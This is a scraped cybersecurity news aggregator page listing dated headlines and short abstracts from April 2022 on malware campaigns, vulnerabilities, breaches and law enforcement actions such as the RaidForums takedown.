Abstract Microsoft has increased the maximum awards for high-impact security flaws reported through the Microsoft 365 and the Dynamics 365 / Power Platform bug bounty programs.

BleepingComputer

April 14, 2022 – Business

Cloud Security Startup DoControl Raises $30 Million Full Text

Abstract The startup said it plans to use the money to scale its SaaS data security product offerings, fuel global growth through aggressive hiring, and build strategic partner programs.

Security Week

April 14, 2022 – Malware

New ZingoStealer infostealer drops more malware, cryptominers Full Text

Abstract A new information-stealing malware called ZingoStealer has been discovered with powerful data-stealing features and the ability to load additional payloads or mine Monero.

BleepingComputer

April 14, 2022 – Attack

Lazarus Targets Chemical Sector Full Text

Abstract The campaign appears to be a continuation of Lazarus activity dubbed Operation Dream Job, which was first observed in August 2020. In the past, it targeted the defense, government, and engineering sectors.

Symantec

April 14, 2022 – Government

FBI links largest crypto hack ever to North Korean hackers Full Text

Abstract The Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned the address that received the cryptocurrency stolen in the largest cryptocurrency hack ever, the hack of Axie Infinity's Ronin network bridge.

BleepingComputer

April 14, 2022 – Government

FBI Memphis Field Office Warns of Increase in Sextortion Schemes Targeting Teenage Boys Full Text

Abstract The FBI is receiving an increasing number of reports of adults posing as age-appropriate females coercing young boys through social media to produce sexual images and videos and then extorting money from them.

FBI

April 14, 2022 – Attack

Hackers target Ukrainian govt with IcedID malware, Zimbra exploits Full Text

Abstract Hackers are targeting Ukrainian government agencies with new attacks exploiting Zimbra exploits and phishing attacks pushing the IcedID malware.

BleepingComputer

April 14, 2022 – Criminals

Haskers Gang Introduces New ZingoStealer Malware for Free to Target Gamers Full Text

Abstract This information stealer, first introduced to the wild in March 2022, is currently undergoing active development and multiple releases of new versions have been observed recently.

Cisco Talos

April 14, 2022 – Breach

Hetzner lost customer data and gave 20€ as compensation Full Text

Abstract Hetzner Online GmbH, a German cloud services provider, told some customers this week that their data had been irreversibly lost and were provided a 20€ compensation in online credit.

BleepingComputer

April 14, 2022 – Education

The top 10 password attacks and how to stop them Full Text

Abstract To better understand how to protect passwords in your environment from attacks, let's look at the top 10 password attacks and see what your organization can do to prevent them.

BleepingComputer

April 14, 2022 – General

Instagram beyond pics: Sexual harassers, crypto crooks, ID thieves Full Text

Abstract A platform for everyone to seamlessly share their best moments online, Instagram is slowly turning into a mecca for the undesirables—from sexual harassers to crypto "investors" helping you "get rich fast." How do you keep yourself safe against such profiles?

BleepingComputer

April 14, 2022 – Vulnerabilities

Flaw in Rarible NFT market allowed theft of crypto assets Full Text

Abstract A security flaw in the Rarible NFT (non-fungible token) marketplace allowed threat actors to use a relatively simple attack vector to steal digital assets from the target's accounts and transfer them directly to their wallets.

BleepingComputer

April 14, 2022 – Attack

OldGremlin ransomware gang targets Russia with new malware Full Text

Abstract OldGremlin, a little-known threat actor that uses its particularly advanced skills to run carefully prepared, sporadic campaigns, has made a comeback last month after a gap of more than one year.

BleepingComputer

April 13, 2022 – APT

U.S. Warns of APT Hackers Targeting ICS/SCADA Systems with Specialized Malware Full Text

Abstract The U.S. government on Wednesday warned of nation-state actors deploying specialized malware to maintain access to industrial control systems (ICS) and supervisory control and data acquisition (SCADA) devices. "The APT actors have developed custom-made tools for targeting ICS/SCADA devices," multiple U.S. agencies  said  in an alert. "The tools enable them to scan for, compromise, and control affected devices once they have established initial access to the operational technology (OT) network." The joint federal advisory comes courtesy of the U.S. Department of Energy (DoE), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI). The custom-made tools are specifically designed to single out Schneider Electric programmable logic controllers (PLCs), OMRON Sysmac NEX PLCs, and Open Platform Communications Unified Architecture (OPC UA) servers. On top of that, the unnamed actors

The Hacker News

April 13, 2022 – Vulnerabilities

Critical VMware Workspace ONE Access Flaw Under Active Exploitation in the Wild Full Text

Abstract A week after VMware released patches to remediate eight security vulnerabilities in VMware Workspace ONE Access, threat actors have begun to actively exploit one of the critical flaws in the wild. Tracked as  CVE-2022-22954 , the critical issue relates to a remote code execution vulnerability that stems from server-side template injection in VMware Workspace ONE Access and Identity Manager. The bug is rated 9.8 in severity. "A malicious actor with network access can trigger a server-side  template injection  that may result in remote code execution," the company  noted  in its advisory. The virtualization services provider has since revised its bulletin to warn customers of confirmed exploitation of CVE-2022-22954 occurring in the wild. Cybersecurity firm Bad Packets also  corroborated  that it detected attempts to weaponize the vulnerability. Source:  Bad Packets It's worth noting that the patches shipped last week address seven more vulnerabilities in VMware Work

The Hacker News

April 13, 2022 – Government

CISA warns orgs to patch actively exploited Windows LPE bug Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) has added ten new security bugs to its list of actively exploited vulnerabilities, including a high severity local privilege escalation bug in the Windows Common Log File System Driver.

BleepingComputer

April 13, 2022 – Attack

Industroyer2 Found Targeting Energy Sector in Ukraine Full Text

Abstract Sandworm APT has been associated with a new Industroyer-2 malware that was used to target electric power systems in Ukraine. Besides, the Sandworm group also uses other malware families such as CaddyWiper, AwfulShred, OrcShred, and SoloShred. Organizations are suggested to follow the recommendation ... Read More

Cyware Alerts - Hacker News

April 13, 2022 – Education

Webinar: How The Right XDR Can Be a Game-Changer for Lean Security Teams Full Text

Abstract Extended detection and response (XDR) is expected to be the future of cybersecurity, merging security technologies with the evolving approach to the way we do cybersecurity. And while many organizations are scrambling to integrate XDR into their cybersecurity strategies – even more are still trying to figure out what XDR really is and if it's even the right solution for their organization.  But there are some organizations that are getting lost in the debate and are wondering if there is a place for them in this new frontier of cybersecurity: organizations with lean security teams and limited resources.  Fortunately, Cynet, a cybersecurity company, is hosting an upcoming webinar in partnership with Enterprise Strategy Group (ESG) that will explore how choosing the right XDR can be impactful for companies lean security teams [ register here ]. During the webinar, Jon Oltsik, Senior Principal Analyst with ESG, and George Tubin, Director of Product Strategy at Cynet, will cover:  Lea

The Hacker News

April 13, 2022 – Vulnerabilities

CVE-2021-31805 RCE bug in Apache Struts was finally patched Full Text

Abstract Apache addressed a critical flaw in Apache Struts RCE that was linked to a previous issue that was not properly fixed. Apache Struts is an open-source web application framework for developing Java EE web applications. The Apache Software Foundation...

Security Affairs

April 13, 2022 – Attack

African banks heavily targeted in RemcosRAT malware campaigns Full Text

Abstract African banks are increasingly targeted by malware distribution campaigns that employ HTML smuggling tricks and typo-squatted domains to drop remote access trojans (RATs).

BleepingComputer

April 13, 2022 – Government

CISA Warns Against Russian Hackers Exploiting a Critical Bug Full Text

Abstract The CISA issued an order urging federal civilian agencies and organizations to fix the actively exploited bug impacting WatchGuard Firebox and XTM appliances. Cyclops Blink, before getting disrupted, targeted nearly one percent WatchGuard Firebox firewall appliances with CVE-2022-23176 exploit ... Read More

Cyware Alerts - Hacker News

April 13, 2022 – Malware

Microsoft Exposes Evasive Chinese Tarrask Malware Attacking Windows Computers Full Text

Abstract The Chinese-backed Hafnium hacking group has been linked to a piece of a new malware that's used to maintain persistence on compromised Windows environments. The threat actor is said to have targeted entities in the telecommunication, internet service provider and data services sectors from August 2021 to February 2022, expanding from the initial victimology patterns observed during its attacks exploiting the then zero-day flaws in  Microsoft Exchange Servers  in March 2021. Microsoft Threat Intelligence Center (MSTIC), which dubbed the defense evasion malware " Tarrask ," characterized it as a tool that creates "hidden" scheduled tasks on the system. "Scheduled task abuse is a very common method of persistence and defense evasion — and an enticing one, at that," the researchers  said . Hafnium, while most notable for Exchange Server attacks, has since leveraged unpatched zero-day vulnerabilities as initial vectors to drop web shells and other mal

The Hacker News

April 13, 2022 – APT

China-linked Hafnium APT leverages Tarrask malware to gain persistence Full Text

Abstract China-linked Hafnium APT group started using a new piece of new malware to gain persistence on compromised Windows systems. The China-backed Hafnium cyberespionage group is likely behind a piece of a new malware, dubbed Tarrask, that's used to maintain...

Security Affairs

April 13, 2022 – Botnet

New Fodcha DDoS botnet targets over 100 victims every day Full Text

Abstract A rapidly growing botnet is ensnaring routers, DVRs, and servers across the Internet to target more than 100 victims every day in distributed denial-of-service (DDoS) attacks.

BleepingComputer

April 13, 2022 – Malware

Fakecalls - An Unusual Twist to Banking Customer Support Frauds Full Text

Abstract A new banking trojan called Fakecalls hijacks phone conversations between a potential victim and its bank customer support to steal files stored on devices. The trojan can play a pre-recorded message that mimics the ones often used by banks to greet customers seeking support. Experts suggest down ... Read More

Cyware Alerts - Hacker News

April 13, 2022 – Attack

Russian Hackers Tried Attacking Ukraine’s Power Grid with Industroyer2 Malware Full Text

Abstract The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday  disclosed  that it thwarted a cyberattack by Sandworm , a hacking group affiliated with Russia's military intelligence, to sabotage the operations of an unnamed energy provider in the country. "The attackers attempted to take down several infrastructure components of their target, namely: Electrical substations, Windows-operated computing systems, Linux-operated server equipment, [and] active network equipment," The State Service of Special Communications and Information Protection of Ukraine (SSSCIP)  said  in a statement. Slovak cybersecurity firm ESET, which collaborated with CERT-UA to analyze the attack, said the attempted intrusion involved the use of ICS-capable malware and regular disk wipers, with the adversary unleashing an updated variant of the  Industroyer  malware, which was first deployed in a 2016 assault on Ukraine's power grid. "The Sandworm attackers made an attempt to d

The Hacker News

April 13, 2022 – Vulnerabilities

JekyllBot:5 flaws allow hacking TUG autonomous mobile robots in hospitals Full Text

Abstract Researchers discovered five vulnerabilities that can be exploited to remotely hack hospital Aethon’s TUG autonomous mobile robots. Researchers at healthcare IoT security firm Cynerio discovered a collection of five vulnerabilities impacting TUG autonomous...

Security Affairs

April 13, 2022 – Vulnerabilities

Hackers exploit critical VMware CVE-2022-22954 bug, patch now Full Text

Abstract Security researchers have published various proof of concepts (PoCs) scripts for exploiting CVE-2022-22954 on social media and other channels, essentially enabling malicious actors to attack unpatched systems.

BleepingComputer

April 13, 2022 – Breach

CitySprint Discloses Security Breach Impacting Personal Data of Delivery Drivers Full Text

Abstract An email was sent on April 7th to thousands of drivers confirming that a security breach had occurred. CitySprint, which was recently acquired by parcel delivery giant DPD Group, uses self-employed drivers to deliver packages across the UK.

Graham Cluley

April 13, 2022 – Criminals

FBI, Europol Seize RaidForums Hacker Forum and Arrest Admin Full Text

Abstract An international law enforcement operation raided and took down RaidForums, one of the world's largest hacking forums notorious for selling access to hacked personal information belonging to users. Dubbed Tourniquet, the seizure of the cybercrime website involved authorities from the U.S., U.K., Sweden, Portugal, and Romania, with the criminal investigation resulting in the  arrest  of the forum's administrator at his home last month in Croydon, England. The three confiscated domains associated with the illicit marketplace include "raidforums[.]com," "Rf[.]ws," and "Raid[.]lol." Diogo Santos Coelho (aka "Omnipotent"), the said founder and chief administrator, was apprehended in the U.K. on January 31 and is pending extradition to the U.S. Santos Coelho has been charged with conspiracy, access device fraud, and aggravated identity theft. In addition to detailing Santos Coelho's central role in designing and administering the soft

The Hacker News

April 13, 2022 – Privacy

EU officials were targeted with Israeli surveillance software Full Text

Abstract According to a report published by Reuters, an Israeli surveillance software was used to spy on senior officials in the European Commission. One of the officials targeted with the infamous spyware there is Didier Reynders, a senior Belgian statesman...

Security Affairs

April 13, 2022 – Government

US warns of govt hackers targeting industrial control systems Full Text

Abstract A joint cybersecurity advisory issued by CISA, NSA, FBI, and the Department of Energy (DOE) warns of government-backed hacking groups being able to hijack multiple industrial devices using a new ICS-focused malware toolkit.

BleepingComputer

April 13, 2022

Update: T-Mobile Secretly Bought Its Customer Data from Hackers to Stop Leak. It Failed. Full Text

Abstract According to court documents unsealed today and reviewed by Motherboard, a third-party hired by T-Mobile tried to pay the hackers for exclusive access to that data and limit it from leaking more widely.

Vice

</div>

April 13, 2022 – Malware

Microsoft disrupts Zloader malware in global operation Full Text

Abstract A months-long global operation led by Microsoft's Digital Crimes Unit (DCU) has taken down dozens of domains used as command-and-control (C2) servers by the notorious ZLoader botnet.

BleepingComputer

April 13, 2022 – Vulnerabilities

Flaws in ABB Network Interface Modules Expose Industrial Systems to DoS Attacks Full Text

Abstract The vulnerabilities affect Symphony Plus SPIET800 and PNI800, which are network interface modules that enable communications between a control network and a host computer running an engineering tool or a human-machine interface (HMI).

Security Week

April 13, 2022 – General

3 Reasons Connected Devices are More Vulnerable than Ever Full Text

Abstract We are surrounded by billions of connected devices that contribute round-the-clock to practically every aspect of our lives - from transportation, to entertainment, to health and well-being. Here are the top three reasons why connected-device cybersecurity is more fragile than ever.

BleepingComputer

April 13, 2022 – General

Hardware-assisted security will go big soon – study Full Text

Abstract Hardware-assisted security (HAS) uses hardware extensions and components to support the security of higher-level machine layers, from the BIOS up through desktop applications.

The Register

April 13, 2022 – Botnet

New EnemyBot DDoS botnet recruits routers and IoTs into its army Full Text

Abstract A new Mirai-based botnet malware named Enemybot has been observed growing its army of infected devices through vulnerabilities in modems, routers, and IoT devices, with the threat actor operating it known as Keksec.

BleepingComputer

April 13, 2022 – Hacker

Hackers Pretend to Poach, Recruit Rival Bank Staff in New Remcos RAT Campaign Full Text

Abstract In recent weeks, the threat actors have been spotted using recruitment emails and messages to entice individuals considering moving from their current employment to rival financial companies.

ZDNet

April 13, 2022 – Vulnerabilities

Critical flaw in Elementor WordPress plugin may affect 500k sites Full Text

Abstract The authors of the Elementor Website Builder plugin for WordPress have just released version 3.6.3 to address a critical remote code execution flaw that may impact as many as 500,000 websites.

BleepingComputer

April 13, 2022 – Vulnerabilities

Critical Apache Struts RCE vulnerability wasn’t fully fixed, patch now Full Text

Abstract Apache has fixed a critical vulnerability in its vastly popular Struts project that was previously believed to have been resolved but, as it turns out, wasn't fully remedied. As such, CISA is urging users and administrators to upgrade to the latest, patched Struts 2 versions.

BleepingComputer

April 12, 2022 – Vulnerabilities

Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities Full Text

Abstract Microsoft's Patch Tuesday updates for the month of April have addressed a  total of 128 security vulnerabilities  spanning across its software product portfolio, including Windows, Defender, Office, Exchange Server, Visual Studio, and Print Spooler, among others. 10 of the 128 bugs fixed are rated Critical, 115 are rated Important, and three are rated Moderate in severity, with one of the flaws listed as publicly known and another under active attack at the time of the release. The updates are in addition to  26 other flaws  resolved by Microsoft in its Chromium-based Edge browser since the start of the month. The actively exploited flaw ( CVE-2022-24521 , CVSS score: 7.8) relates to an elevation of privilege vulnerability in the Windows Common Log File System (CLFS). Credited with reporting the flaw are the U.S. National Security Agency (NSA) and CrowdStrike researchers Adam Podlosky and Amir Bazine. The second publicly-known zero-day flaw ( CVE-2022-26904 , CVSS score: 7.0)

The Hacker News

April 12, 2022 – Solution

Cross-Regional Disaster Recovery with Elasticsearch Full Text

Abstract Unsurprisingly, here at  Rewind , we've got a lot of data to protect (over 2 petabytes worth). One of the databases we use is called Elasticsearch (ES or Opensearch, as it is currently known in AWS). To put it simply, ES is a document database that facilitates lightning-fast search results. Speed is essential when customers are looking for a particular file or item that they need to restore using  Rewind . Every second of downtime counts, so our search results need to be fast, accurate, and reliable. Another consideration was disaster  recovery . As part of our  System and Organization Controls Level 2 (SOC2)  certification process, we needed to ensure we had a working disaster recovery plan to restore service in the unlikely event that the entire AWS region was down. "An entire AWS region?? That will never happen!" (Except for  when it did )  Anything is possible, things go wrong, and in order to meet our SOC2 requirements we needed to have a working solution. Specif

The Hacker News

April 12, 2022 – Criminals

Ethereum dev imprisoned for helping North Korea evade sanctions Full Text

Abstract Virgil Griffith, a US cryptocurrency expert, was sentenced on Tuesday to 63 months in prison after pleading guilty to assisting the Democratic People's Republic of Korea (DPRK) with technical info on how to evade sanctions.

BleepingComputer

April 12, 2022 – Botnet

SharkBot Propagates via Fake Antivirus Apps on Google Play Full Text

Abstract Check Point researchers discovered seven malicious apps on the Google Play Store posing as antivirus solutions to drop the SharkBot banking trojan. These malicious apps were downloaded more than 15,000 times before Google removed them. Researchers advise downloading apps only from trusted/verified ... Read More

Cyware Alerts - Hacker News

April 12, 2022 – Vulnerabilities

Critical LFI Vulnerability Reported in Hashnode Blogging Platform Full Text

Abstract Researchers have disclosed a previously undocumented local file inclusion ( LFI ) vulnerability in  Hashnode , a developer-oriented blogging platform, that could be abused to access sensitive data such as SSH keys, server's IP address, and other network information. "The LFI originates in a  Bulk Markdown Import feature  that can be manipulated to provide attackers with unimpeded ability to download local files from Hashnode's server," Akamai researchers said in a report shared with The Hacker News. Local file inclusion flaws occur when a web application is tricked into exposing or running unapproved files on a server, leading to directory traversal, information disclosure, remote code execution, and cross-site scripting (XSS) attacks. The flaw, caused due to the web application failing to adequately sanitize the path to a file that's passed as input, could have serious repercussions in that an assailant could navigate to any path on the server and access s

The Hacker News

April 12, 2022 – General

Cybersecuring the Pipeline Full Text

Abstract The two TSA mandatory directives are a welcome step to ensure that pipeline owners and operators implement the basic safeguards required to repel cyberattacks. Yet certain weaknesses in the current approach need to be acknowledged.

Lawfare

April 12, 2022 – Vulnerabilities

Microsoft Partch Tuesday for April 2022 fixed 10 critical vulnerabilities Full Text

Abstract Microsoft Partch Tuesday security updates for April 2022 fixed 128 vulnerabilities, including an actively exploited zero-day reported by NSA. Microsoft Partch Tuesday security updates for April 2022 fixed 128 vulnerabilities in multiple products,...

Security Affairs

April 12, 2022 – Denial Of Service

Ransom DDoS attacks have dropped to record lows this year Full Text

Abstract Extortion denial-of-service activity, the so-called RDDoS (ransom distributed denial-of-service) attacks have taken a tumble in the first quarter of the year, according to recent statistics from Cloudflare.

BleepingComputer

April 12, 2022 – Malware

New Octo Banking Trojan Abuses Android Accessibility Features Full Text

Abstract ThreatFabric stumbled across Octo, a rental banking trojan capable of gaining remote access to compromised devices. It is said to be a rebrand of a similar Android threat called ExobotCompact. The malicious apps acting as droppers are identified as Pocket Screencaster, Fast Cleaner 2021, Play Store ... Read More

Cyware Alerts - Hacker News

April 12, 2022 – Privacy

E.U. Officials Reportedly Targeted with Israeli Pegasus Spyware Full Text

Abstract Senior officials in the European Union were allegedly targeted with NSO Group's infamous Pegasus surveillance tool, according to a  new report  from Reuters. At least five individuals, including European Justice Commissioner Didier Reynders, are said to have been singled out in total, the news agency said, citing documents and two unnamed E.U. officials. However, it's not clear who used the commercial spyware against them or what information was obtained following the attacks. NSO Group said in a statement shared with Reuters that it was not responsible for the hacking attempts, adding that the targeting "could not have happened with NSO's tools." The targeting is said to have come to light after Apple notified the victims of state-sponsored attacks last November as part of its efforts to stop the Israeli surveillance firm from targeting its customers. That same month, the iPhone maker  filed a lawsuit  against NSO Group, seeking a court-issued injunction ai

The Hacker News

April 12, 2022 – Criminals

Operation TOURNIQUET: Authorities shut down dark web marketplace RaidForums Full Text

Abstract The dark web marketplace RaidForums has been shut down and its infrastructure seized as a result of Operation TOURNIQUET. The illegal dark web marketplace RaidForums has been shut down and its infrastructure seized as a result of the international...

Security Affairs

April 12, 2022 – Vulnerabilities

Microsoft April 2022 Patch Tuesday fixes 119 flaws, 2 zero-days Full Text

Abstract Today is Microsoft's April 2022 Patch Tuesday, and with it comes fixes for two zero-day vulnerabilities and a total of 119 flaws.

BleepingComputer

April 12, 2022 – Malware

New META Stealer is Popular in the Underground Marketplaces Full Text

Abstract A researcher unearthed a malspam campaign distributing the new META infostealer to steal passwords stored in browsers, including Google Chrome, Edge, and Firefox, as well as cryptocurrency wallets. META tampers with Windows Defender using PowerShell to exclude .exe files from scanning to avoid ... Read More

Cyware Alerts - Hacker News

April 12, 2022 – Vulnerabilities

NGINX Shares Mitigations for Zero-Day Bug Affecting LDAP Implementation Full Text

Abstract The maintainers of the NGINX web server project have issued mitigations to address security weaknesses in its Lightweight Directory Access Protocol ( LDAP ) Reference Implementation. "NGINX Open Source and NGINX Plus are not themselves affected, and no corrective action is necessary if you do not use the reference implementation," Liam Crilly and Timo Stark of F5 Networks  said  in an advisory published Monday. NGINX said that the  reference implementation , which  uses LDAP to authenticate users , is impacted only under three conditions if the deployments involve - Command-line parameters to configure the Python-based reference implementation daemon Unused, optional configuration parameters, and Specific group membership to carry out LDAP authentication Should any of the aforementioned conditions be met, an attacker could potentially override the configuration parameters by sending specially crafted HTTP request headers and even bypass group membership requirement

The Hacker News

April 12, 2022 – APT

Russia-linked Sandworm APT targets energy facilities in Ukraine with wipers Full Text

Abstract Russia-linked Sandworm APT group targeted energy facilities in Ukraine with INDUSTROYER2 and CADDYWIPER wipers. Russia-linked Sandworm threat actors targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2)...

Security Affairs

April 12, 2022 – Malware

Microsoft: New malware uses Windows bug to hide scheduled tasks Full Text

Abstract Microsoft has discovered a new malware used by the Chinese-backed Hafnium hacking group to maintain persistence on compromised Windows systems by creating and hiding scheduled tasks.

BleepingComputer

April 12, 2022 – Attack

Attackers Abuse AWS Lambda to Mine Monero Full Text

Abstract Researchers stumbled across a new malware variant, dubbed Denonia, that targets AWS Lambda, a scalable cloud computing service used by SMBs and enterprise players worldwide. It is a Go-based wrapper designed to deploy a custom XMRig crypto miner for Monero mining. Experts suggest always using ... Read More

Cyware Alerts - Hacker News

April 12, 2022 – General

Finding Attack Paths in Cloud Environments Full Text

Abstract The mass adoption of cloud infrastructure is fully justified by innumerable advantages. As a result, today, organizations' most sensitive business applications, workloads, and data are in the cloud. Hackers, good and bad, have noticed that trend and effectively evolved their attack techniques to match this new tantalizing target landscape. With threat actors' high reactivity and adaptability, it is recommended to assume that organizations are under attack and that some user accounts or applications might already have been compromised. Finding out exactly which assets are put at risk through compromised accounts or breached assets requires mapping potential attack paths across a comprehensive map of all the relationships between assets.  Today, mapping potential attack paths is performed with scanning tools such as AzureHound or AWSPX. Those are graph-based tools enabling the visualization of assets and resources relationships within the related cloud service provider. By r

The Hacker News

April 12, 2022 – Vulnerabilities

NGINX project maintainers fix flaws in LDAP Reference Implementation Full Text

Abstract The maintainers of the NGINX web server project addressed a zero-day vulnerability in the Lightweight Directory Access Protocol (LDAP) Reference Implementation. The maintainers of the NGINX web server project have released security updates to address...

Security Affairs

April 12, 2022 – Vulnerabilities

Critical HP Teradici PCoIP flaws impact 15 million endpoints Full Text

Abstract HP is warning of new critical security vulnerabilities in the Teradici PCoIP client and agent for Windows, Linux, and macOS that impact 15 million endpoints.

BleepingComputer

April 12, 2022 – Phishing

DPRK-Nexus Adversary Targets South Korean Individuals in a New Chapter of Kitty Phishing Operation Full Text

Abstract Cluster25 traced a recent activity that started in the first days of April 2022 from a DPRK-nexus threat actor using spear-phishing emails containing Korean-based malicious documents with different lures to compromise its victims.

Cluster25

April 12, 2022 – Policy and Law

Google Sues Scammer for Running ‘Puppy Fraud Scheme’ Website Full Text

Abstract Google on Monday disclosed that it's taking legal action against a nefarious actor who has been spotted operating fraudulent websites to defraud unsuspecting people into buying non-existent puppies. "The actor used a network of fraudulent websites that claimed to sell basset hound puppies — with alluring photos and fake customer testimonials — in order to take advantage of people during the pandemic," Google's CyberCrime Investigation Group manager Albert Shin and senior counsel Mike Trinh  said . The fraudulent scheme involved Nche Noel Ntse of Cameroon using a network of rogue websites, Google Voice phone numbers, and Gmail accounts to trick people into paying thousands of dollars online for "adorable puppies" that never arrived. The purported culprit is also alleged to have run a Google Ads campaign to push the fraudulent websites on top of search results pages as part of what Google characterized as "multiple international non-delivery scams.&

The Hacker News

April 12, 2022 – Government

CISA adds WatchGuard flaw to its Known Exploited Vulnerabilities Catalog Full Text

Abstract The U.S. CISA added the CVE-2022-23176 flaw in WatchGuard Firebox and XTM appliances to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2022-23176 flaw in WatchGuard Firebox...

Security Affairs

April 12, 2022 – Criminals

RaidForums hacking forum seized by police, owner arrested Full Text

Abstract The RaidForums hacker forum, used mainly for trading and selling stolen databases, has been shut down and its domain seized by U.S. law enforcement during Operation TOURNIQUET, an action coordinated by Europol that involved law enforcement agencies in several countries.

BleepingComputer

April 12, 2022 – Phishing

Double-Your-Crypto Scams Share Crypto Scam Host – Krebs on Security Full Text

Abstract The ark-x2[.]org site pretended to be a crypto giveaway website run by Cathie Wood, the founder and CEO of ARKinvest, an established Florida company that manages several exchange-traded investment funds.

Krebs on Security

April 12, 2022 – Criminals

LockBit ransomware gang lurked in a U.S. gov network for months Full Text

Abstract Threat analysts have found evidence of malicious actors using the LockBit ransomware strain lingering in the network of a regional U.S. government agency for at least five months.

BleepingComputer

April 12, 2022 – Attack

Panasonic’s Canadian Operations Suffered Ransomware Attack Full Text

Abstract In a statement provided to TechCrunch, Panasonic said that it was a victim of a “targeted cybersecurity attack” in February that affected some of its systems, processes, and networks.

Tech Crunch

April 12, 2022 – Attack

Sandworm hackers fail to take down Ukrainian energy provider Full Text

Abstract The Russian state-sponsored hacking group known as Sandworm tried on Friday to take down a large Ukrainian energy provider by disconnecting its electrical substations with a new variant of the Industroyer malware for industrial control systems (ICS) and a new version of the CaddyWiper data destruction malware.

BleepingComputer

April 12, 2022 – Business

Kaseya to acquire Datto for $6.2 billion Full Text

Abstract The all-cash transaction will be funded by an equity consortium led by Insight Partners, with significant investment from TPG Capital and Temasek, and participation from notable investors including Sixth Street.

Help Net Security

April 12, 2022 – Attack

BlackCat Ransomware Group Claims Attack on Florida International University Full Text

Abstract The ransomware group, which most recently attacked North Carolina A&T University, claimed it has stolen a range of personal information from students, teachers, and staff.

The Record

April 12, 2022 – Malware

Industroyer2: Industroyer reloaded Full Text

Abstract ESET researchers responded to a cyber-incident affecting an energy provider in Ukraine. The collaboration resulted in the discovery of a new variant of Industroyer malware named Industroyer2.

ESET Security

April 12, 2022 – Vulnerabilities

AWS RDS Vulnerability Leads to AWS Internal Service Credentials Full Text

Abstract Lightspin's Research Team obtained credentials to an internal AWS service by exploiting a local file read vulnerability on the RDS EC2 instance using the log_fdw extension.

Security Boulevard

April 11, 2022 – Malware

Third npm protestware: ‘event-source-polyfill’ calls Russia out Full Text

Abstract Developers are increasingly voicing their opinions through their open source projects in active use by thousands of software applications and organizations. Most recently, the developer of the 'event-source-polyfill' npm package peacefully protested Russia's "unreasonable invasion" of Ukraine, to Russian consumers.

BleepingComputer

April 11, 2022 – Breach

Over 16,500 Sites Hacked to Distribute Malware via Web Redirect Service Full Text

Abstract A new traffic direction system (TDS) called Parrot has been spotted leveraging tens of thousands of compromised websites to launch further malicious campaigns. "The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites, personal websites, university sites, and local government sites," Avast researchers Pavel Novák and Jan Rubín  said  in a report published last week. Traffic direction systems are used by threat actors to determine whether or not a target is of interest and should be redirected to a malicious domain under their control and act as a gateway to compromise their systems with malware. Earlier this January, the BlackBerry Research and Intelligence Team detailed another TDS called  Prometheus  that has been put to use in different campaigns mounted by cybercriminal groups to distribute Campo Loader, Hancitor, IcedID, QBot, Buer Loader, and SocGholish malware. What makes Parrot TDS stand out is its huge reach,

The Hacker News

April 11, 2022 – Government

CISA warns orgs of WatchGuard bug exploited by Russian state hackers Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal civilian agencies and urged all US organizations on Monday to patch an actively exploited bug impacting WatchGuard Firebox and XTM firewall appliances.

BleepingComputer

April 11, 2022 – Botnet

Russia-linked Cyclops Blink Botnet Taken Down Full Text

Abstract The FBI announced taking down the Cyclops Blink botnet, which used to target firewall appliances and SOHO networking devices. It was under the control of the Russian Sandworm group. The operation's initial court authorization was given on March 18, the botnet infection was fully removed from all id ... Read More

Cyware Alerts - Hacker News

April 11, 2022 – Breach

Anonymous hacked Russia’s Ministry of Culture and leaked 446 GB Full Text

Abstract The Anonymous collective has hacked Russia's Ministry of Culture and leaked 446 GB of data through the DDoSecrets platform. Data leak service DDoSecrets has published over 700 GB of data allegedly stolen from the Russian government, including over...

Security Affairs

April 11, 2022 – Malware

Rise in npm protestware: another open source dev calls Russia out Full Text

Abstract Developers are increasingly voicing their opinions through their open source projects in active use by thousands of software applications and organizations. Most recently, the developer of the 'event-source-polyfill' npm package peacefully protested Russia's "unreasonable invasion" of Ukraine, to Russian consumers.

BleepingComputer

April 11, 2022 – Attack

Operation Bearded Barbie Aims to Catfish Israeli Officials Full Text

Abstract AridViper APT group was found targeting high-ranking Israeli officials in a cyberespionage campaign to spy and steal data by compromising their systems and mobile devices. The attackers have created various fake Facebook profiles with fabricated identities and stolen or AI-generated images of good- ... Read More

Cyware Alerts - Hacker News

April 11, 2022 – Malware

FFDroider, a new information-stealing malware disguised as Telegram app Full Text

Abstract Cybersecurity researchers spotted a new Windows information-stealing malware, named FFDroider, designed to steal credentials and cookies. Cybersecurity researchers from Zscaler ThreatLabz warn of a new information-stealing malware, named FFDroider,...

Security Affairs

April 11, 2022 – Malware

Qbot malware switches to new Windows Installer infection vector Full Text

Abstract The Qbot botnet is now pushing malware payloads via phishing emails with password-protected ZIP archive attachments containing malicious MSI Windows Installer packages.

BleepingComputer

April 11, 2022 – Attack

Parrot TDS: A New Web Redirect Service Full Text

Abstract Avast laid bare an attack campaign abusing the new Parrot TDS, which has infected over 16,500 websites across different verticals, to deliver RATs via bogus browser update prompts. The campaign started in February, while the signs of Parrot activity have been traced back to October last year. Exper ... Read More

Cyware Alerts - Hacker News

April 11, 2022 – Breach

SuperCare Health discloses a data breach that Impacted +300K people Full Text

Abstract SuperCare Health, a leading respiratory care provider in the Western U.S, disclosed a data breach that impacted more than 300,000 individuals. SuperCare Health disclosed a security breach that has led to the exposure of personal information belonging...

Security Affairs

April 11, 2022 – Attack

Luxury fashion house Zegna confirms August ransomware attack Full Text

Abstract The Italian luxury fashion company Ermenegildo Zegna has disclosed a ransomware incident from August 2021 that has resulted in an extensive IT systems outage.

BleepingComputer

April 11, 2022 – Vulnerabilities

Access control vulnerability in Easy!Appointments platform exposed sensitive personal data Full Text

Abstract An access control vulnerability in open-source scheduling platform Easy!Appointments gave unauthenticated attackers easy access to personally identifiable information (PII), a security researcher has revealed.

The Daily Swig

April 11, 2022 – Malware

Android banking malware intercepts calls to customer support Full Text

